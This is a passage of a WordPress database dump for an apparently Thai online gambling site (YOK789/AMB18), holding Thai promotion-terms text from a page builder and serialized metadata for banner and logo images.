data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 <b>YOK789<\\/b><\\/strong>\\u00a0\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><strong data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>YOK789<\\/b> \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2608,344,'_thumbnail_id','282'),(2618,345,'_wp_attached_file','2026/02/3icon-AMB18.webp'),(2619,345,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2026/02/3icon-AMB18.webp\";s:8:\"filesize\";i:58638;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"3icon-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11654;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"3icon-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:50860;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"3icon-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5804;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"3icon-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:36052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2620,346,'_wp_attached_file','2026/02/20-get-100-Banner-AMB18.webp'),(2621,346,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:36:\"2026/02/20-get-100-Banner-AMB18.webp\";s:8:\"filesize\";i:102656;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"20-get-100-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12216;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"20-get-100-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:69952;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"20-get-100-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6988;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"20-get-100-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:47202;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2622,347,'_wp_attached_file','2026/02/79-get-200-Banner-AMB18.webp'),(2623,347,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:36:\"2026/02/79-get-200-Banner-AMB18.webp\";s:8:\"filesize\";i:106528;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"79-get-200-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12964;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"79-get-200-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:74292;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"79-get-200-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7340;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"79-get-200-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:50902;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2624,348,'_wp_attached_file','2026/02/512-AMB18.webp'),(2625,348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:22:\"2026/02/512-AMB18.webp\";s:8:\"filesize\";i:7326;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"512-AMB18-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4572;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"512-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2436;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2626,349,'_wp_attached_file','2026/02/AMB18-logo-scaled.webp'),(2627,349,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:979;s:4:\"file\";s:30:\"2026/02/AMB18-logo-scaled.webp\";s:8:\"filesize\";i:33430;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"AMB18-logo-300x115.webp\";s:5:\"width\";i:300;s:6:\"height\";i:115;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4260;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"AMB18-logo-1024x391.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13148;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"AMB18-logo-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:1592;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"AMB18-logo-768x294.webp\";s:5:\"width\";i:768;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10328;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:24:\"AMB18-logo-1536x587.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19520;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:24:\"AMB18-logo-2048x783.webp\";s:5:\"width\";i:2048;s:6:\"height\";i:783;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:26608;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:15:\"AMB18-logo.webp\";}'),(2628,350,'_wp_attached_file','2026/02/Bonus-free-100_-Banner-AMB18.webp'),(2629,350,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2026/02/Bonus-free-100_-Banner-AMB18.webp\";s:8:\"filesize\";i:97120;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:41:\"Bonus-free-100_-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12360;}s:5:\"large\";a:5:{s:4:\"file\";s:42:\"Bonus-free-100_-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:67576;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:41:\"Bonus-free-100_-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:41:\"Bonus-free-100_-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:46578;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2630,351,'_wp_attached_file','2026/02/Character-1-1-1.webp'),(2631,351,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2026/02/Character-1-1-1.webp\";s:8:\"filesize\";i:67852;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"Character-1-1-1-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10456;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"Character-1-1-1-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:53690;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"Character-1-1-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9292;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"Character-1-1-1-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:36780;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2632,352,'_wp_attached_file','2026/02/Character-2-1-1.webp'),(2633,352,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2026/02/Character-2-1-1.webp\";s:8:\"filesize\";i:66126;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"Character-2-1-1-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9818;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"Character-2-1-1-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:49076;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"Character-2-1-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8592;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"Character-2-1-1-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:35312;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2634,353,'_wp_attached_file','2026/02/Character-3-1-1.webp'),(2635,353,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:28:\"2026/02/Character-3-1-1.webp\";s:8:\"filesize\";i:146826;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"Character-3-1-1-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16902;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"Character-3-1-1-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:104462;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"Character-3-1-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14400;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"Character-3-1-1-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:69758;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2636,354,'_wp_attached_file','2026/02/Demo-play-slot-Banner-AMB18.webp');
INSERT INTO `IwGJ28BV_postmeta` VALUES (2637,354,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:40:\"2026/02/Demo-play-slot-Banner-AMB18.webp\";s:8:\"filesize\";i:109988;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Demo-play-slot-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14830;}s:5:\"large\";a:5:{s:4:\"file\";s:41:\"Demo-play-slot-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:78234;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Demo-play-slot-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8604;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Demo-play-slot-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:54818;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2638,355,'_wp_attached_file','2026/02/HBD-Banner-AMB18.webp'),(2639,355,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:29:\"2026/02/HBD-Banner-AMB18.webp\";s:8:\"filesize\";i:107992;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"HBD-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14316;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"HBD-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:77604;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"HBD-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8154;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"HBD-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:54968;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2640,356,'_wp_attached_file','2026/02/JILI-1.webp'),(2641,356,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:19:\"2026/02/JILI-1.webp\";s:8:\"filesize\";i:53430;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"JILI-1-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:23842;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"JILI-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11192;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2642,357,'_wp_attached_file','2026/02/JOKER-1.webp'),(2643,357,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2026/02/JOKER-1.webp\";s:8:\"filesize\";i:46184;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"JOKER-1-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:21652;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"JOKER-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10506;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2644,358,'_wp_attached_file','2026/02/Lucky-wheel-Banner-AMB18.webp'),(2645,358,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:500;s:4:\"file\";s:37:\"2026/02/Lucky-wheel-Banner-AMB18.webp\";s:8:\"filesize\";i:99272;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"Lucky-wheel-Banner-AMB18-300x125.webp\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13938;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"Lucky-wheel-Banner-AMB18-1024x427.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:72192;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"Lucky-wheel-Banner-AMB18-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:8142;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"Lucky-wheel-Banner-AMB18-768x320.webp\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:49864;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2646,359,'_wp_attached_file','2026/02/Microgaming-1.webp'),(2647,359,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:314;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2026/02/Microgaming-1.webp\";s:8:\"filesize\";i:29092;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Microgaming-1-188x300.webp\";s:5:\"width\";i:188;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12702;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Microgaming-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5706;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2648,348,'_wp_attachment_image_alt','AMB18'),(2649,360,'_wp_attached_file','2026/02/PG-1.webp'),(2650,360,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:651;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2026/02/PG-1.webp\";s:8:\"filesize\";i:123820;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"PG-1-300x230.webp\";s:5:\"width\";i:300;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:27600;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"PG-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13324;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";